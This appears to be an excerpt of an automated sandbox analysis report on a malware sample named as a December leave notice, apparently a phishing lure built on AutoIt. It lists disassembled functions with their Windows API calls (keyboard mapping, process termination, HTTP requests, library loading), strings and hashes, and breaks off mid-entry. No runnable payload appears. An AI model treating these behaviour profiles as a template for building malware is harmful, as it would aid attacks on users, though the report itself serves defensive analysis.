                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 2942034483-0
                                                      • Opcode ID: bd0ecfa3e02fc47322f7f34e90d5a8876db56498d8219f2b8c85810aeda9d154
                                                      • Instruction ID: db98fd17e194b8bbc00fc9319efba5b60ace41a677613241972b46c7d8b0ebf7
                                                      • Opcode Fuzzy Hash: bd0ecfa3e02fc47322f7f34e90d5a8876db56498d8219f2b8c85810aeda9d154
                                                      • Instruction Fuzzy Hash: 24F096F251D31119E6357774BC46E4B36D8AF83770F240699F8A0C50DAFF2D884161B0
                                                      Function 00F827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F8281D
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F82825
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F82830
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F8283B
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F82843
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F8284B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 8b558b3f3b82defa7c1c7848fde449488c55ed75d91c12809a8fbcb6cd3264ee
                                                      • Instruction ID: 711a4ae2361d3fcf022ffd8b4e70d22d029270f5b37eca669703bf6fbc17711c
                                                      • Opcode Fuzzy Hash: 8b558b3f3b82defa7c1c7848fde449488c55ed75d91c12809a8fbcb6cd3264ee
                                                      • Instruction Fuzzy Hash: 690167B0902B5ABDE3008FAA8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                      Function 00FC9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 1423608774-0
                                                      • Opcode ID: af044a6da4511f08b6b431910030a54183ab3ec06ded30326803bf909376f5fe
                                                      • Instruction ID: 128a3bce610fbb1ec7c9ed02a5bb9a419961155dab3028debef03175c427d53b
                                                      • Opcode Fuzzy Hash: af044a6da4511f08b6b431910030a54183ab3ec06ded30326803bf909376f5fe
                                                      • Instruction Fuzzy Hash: 54018632506612ABD7261BD4ED4DEEB7769FF98721B04042DF54392088DBBD9800EB60
                                                      Function 00FC7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FC7C07
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FC7C1D
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00FC7C2C
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C3B
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C45
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FC7C4C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 1ed5209458853ffb12d688d1b745b6c15c50e344883c844fd77ba12adb3f24f2
                                                      • Instruction ID: 7f354f799f356a634401bda845e9cd8c12c97d5f6bcd0edebb77338cc0ca9bb8
                                                      • Opcode Fuzzy Hash: 1ed5209458853ffb12d688d1b745b6c15c50e344883c844fd77ba12adb3f24f2
                                                      • Instruction Fuzzy Hash: 9EF06772201158BBE6325BD29C0EEEF3B7CEBCAB11F000018FA4192045DBAA1A41D7B4
                                                      Function 00FC9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00FC9A33
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A44
                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A51
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A5E
                                                        • Part of subcall function 00FC93D1: CloseHandle.KERNEL32(?,?,00FC9A6B,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC93DB
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC9A71
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00FF5DEE,?,?,?,?,?,00F8ED63), ref: 00FC9A78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 69e80c4142a5faad0dcfbfa78bf9c9eae79d9b791050ac73b43db5ac4dda7e1c
                                                      • Instruction ID: 990f04636cc80f9902e472661d6f766bb61ede878e0bd57b34e7355c83ca3952
                                                      • Opcode Fuzzy Hash: 69e80c4142a5faad0dcfbfa78bf9c9eae79d9b791050ac73b43db5ac4dda7e1c
                                                      • Instruction Fuzzy Hash: 59F0BE32545602ABD3221BE4FD8DEAA3729FF98321F040025F24391098CBBE9800EB60
                                                      Function 00F81CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • __swprintf.LIBCMT ref: 00F81EA6
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F81D49
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 2125237772-557222456
                                                      • Opcode ID: e7a1d59c7b6c263d8bf6613d8dde6efef4ab2ab67cb65c9c04fabbab842a9151
                                                      • Instruction ID: 448fcd16d90b4e80cbbacf061d3a4655b7752324f3d0d617394f6798780c15c4
                                                      • Opcode Fuzzy Hash: e7a1d59c7b6c263d8bf6613d8dde6efef4ab2ab67cb65c9c04fabbab842a9151
                                                      • Instruction Fuzzy Hash: 2691AA726042059FC724FF24CD86CAEB7A8BF85710F04491DF986972A1DB34ED05EB92
                                                      Function 00FDAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FDB006
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FDB115
                                                      • VariantClear.OLEAUT32(?), ref: 00FDB298
                                                        • Part of subcall function 00FC9DC5: VariantInit.OLEAUT32(00000000), ref: 00FC9E05
                                                        • Part of subcall function 00FC9DC5: VariantCopy.OLEAUT32(?,?), ref: 00FC9E0E
                                                        • Part of subcall function 00FC9DC5: VariantClear.OLEAUT32(?), ref: 00FC9E1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 7c0128ba9fac3a1b75aee29fa1cf917c6e974a9262625627ac06281dc1c851f4
                                                      • Instruction ID: ba953e45ad62e5f6cc48fe3c089c81556cd4c2ff5191ecc97a0ba2e573e103e3
                                                      • Opcode Fuzzy Hash: 7c0128ba9fac3a1b75aee29fa1cf917c6e974a9262625627ac06281dc1c851f4
                                                      • Instruction Fuzzy Hash: E1917C71608301DFCB10EF64C885A9AB7E5BF89714F08482EF89A9B351DB35E905DB52
                                                      Function 00FC5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • _memset.LIBCMT ref: 00FC5438
                                                      • GetMenuItemInfoW.USER32(?), ref: 00FC5467
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FC5513
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FC553D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: c8bf273c7cef395fd05c65756ba551c77d17b85fbb73d0a0bc90a1acac5ea8fe
                                                      • Instruction ID: cdc22346bc58cfbbc643f3a2e61cf3fea977b4fbdaff2ced56afb19c94e84307
                                                      • Opcode Fuzzy Hash: c8bf273c7cef395fd05c65756ba551c77d17b85fbb73d0a0bc90a1acac5ea8fe
                                                      • Instruction Fuzzy Hash: A45138729047029BD714DB28CA42FAB77E9AF95B64F080A2DF895C3190D774FCC4A752
                                                      Function 00FC0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FC027B
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FC02B1
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FC02C2
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FC0344
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: cfdb27f993317874fdb9b07827975ddead3e67061f31db27d6f621fc033d7407
                                                      • Instruction ID: e93fbec090eca8978b1cf1a41f08046410189e9e66eb75e9ed4155c71f655374
                                                      • Opcode Fuzzy Hash: cfdb27f993317874fdb9b07827975ddead3e67061f31db27d6f621fc033d7407
                                                      • Instruction Fuzzy Hash: 97419E71A04205EFDB05CF94C986F9A7BA9EF84310F1480ADA909DF246DBB5D942DBA0
                                                      Function 00FC5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC5075
                                                      • GetMenuItemInfoW.USER32 ref: 00FC5091
                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00FC50D7
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01041708,00000000), ref: 00FC5120
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 610581c3e2e63420ff5a73c941b310db390c7b183a2c46b62a9bb9344da454c4
                                                      • Instruction ID: 483ce19c6acb82ebcaf8f10342d7b0fd37e647e94cbe41271217ab8643f7da51
                                                      • Opcode Fuzzy Hash: 610581c3e2e63420ff5a73c941b310db390c7b183a2c46b62a9bb9344da454c4
                                                      • Instruction Fuzzy Hash: BC41D2716047029FD720DF24DD8AF6ABBE4AF89B24F08461EF89597281D734F844DB62
                                                      Function 00FE0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00FE0587
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 2358735015-567219261
                                                      • Opcode ID: 3e829edf6fa7789723ea9ce13c08f06a095a99d3e573f6a0b70e7e980c934e69
                                                      • Instruction ID: ec1023b234ab5f2deca163e932acd593533f2b5584936b9626e417d92e9abb22
                                                      • Opcode Fuzzy Hash: 3e829edf6fa7789723ea9ce13c08f06a095a99d3e573f6a0b70e7e980c934e69
                                                      • Instruction Fuzzy Hash: 8631A130900656AFCF00EF64CC41AEEB3B4FF95314B108629E466AB3D1DB75E955DB90
                                                      Function 00FBB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FBB88E
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FBB8A1
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FBB8D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: b28cb16db4144b4d9a05cb59b3b549cb945d7dde49e235f5befc90a84c63c6aa
                                                      • Instruction ID: 4672dae50181a959e710dcb522b027f1ea5866e452b2f6a980878858a21a212e
                                                      • Opcode Fuzzy Hash: b28cb16db4144b4d9a05cb59b3b549cb945d7dde49e235f5befc90a84c63c6aa
                                                      • Instruction Fuzzy Hash: C421F176900108BFDB14ABB5DC86DFE77BCDF45364B144129F061A71E0DBB98D0AAB60
                                                      Function 00FD43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FD4401
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FD4427
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FD4457
                                                      • InternetCloseHandle.WININET(00000000), ref: 00FD449E
                                                        • Part of subcall function 00FD5052: GetLastError.KERNEL32(?,?,00FD43CC,00000000,00000000,00000001), ref: 00FD5067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 1951874230-3916222277
                                                      • Opcode ID: 29824112140a36252d7ef4a17be06ad2123cb63a22b4875a6d740b7eddae63e3
                                                      • Instruction ID: 4ca2ee54bafab2b44167855f70605b53e7cf79523dee0b241563fe4220dd42bf
                                                      • Opcode Fuzzy Hash: 29824112140a36252d7ef4a17be06ad2123cb63a22b4875a6d740b7eddae63e3
                                                      • Instruction Fuzzy Hash: 4A21A1B2500208BFE711DF948C85FBB76EDFB49754F14801AF549D2240EA789D456771
                                                      Function 00FE90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FE915C
                                                      • LoadLibraryW.KERNEL32(?), ref: 00FE9163
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FE9178
                                                      • DestroyWindow.USER32(?), ref: 00FE9180
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: 8ec45747dfd9b3eca91053799c67757011a2a7aa8a13845ddf483e092bc46a83
                                                      • Instruction ID: 53a4212ecbf9930f5754dd3f3a02466cba9fab4ff34e2e1234bd14cee4471f02
                                                      • Opcode Fuzzy Hash: 8ec45747dfd9b3eca91053799c67757011a2a7aa8a13845ddf483e092bc46a83
                                                      • Instruction Fuzzy Hash: 23219271608246BBEF204EA6DC84EBA37ADEF99374F100619F95496190C7BADC41B770
                                                      Function 00FC9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00FC9588
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC95B9
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00FC95CB
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FC9605
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
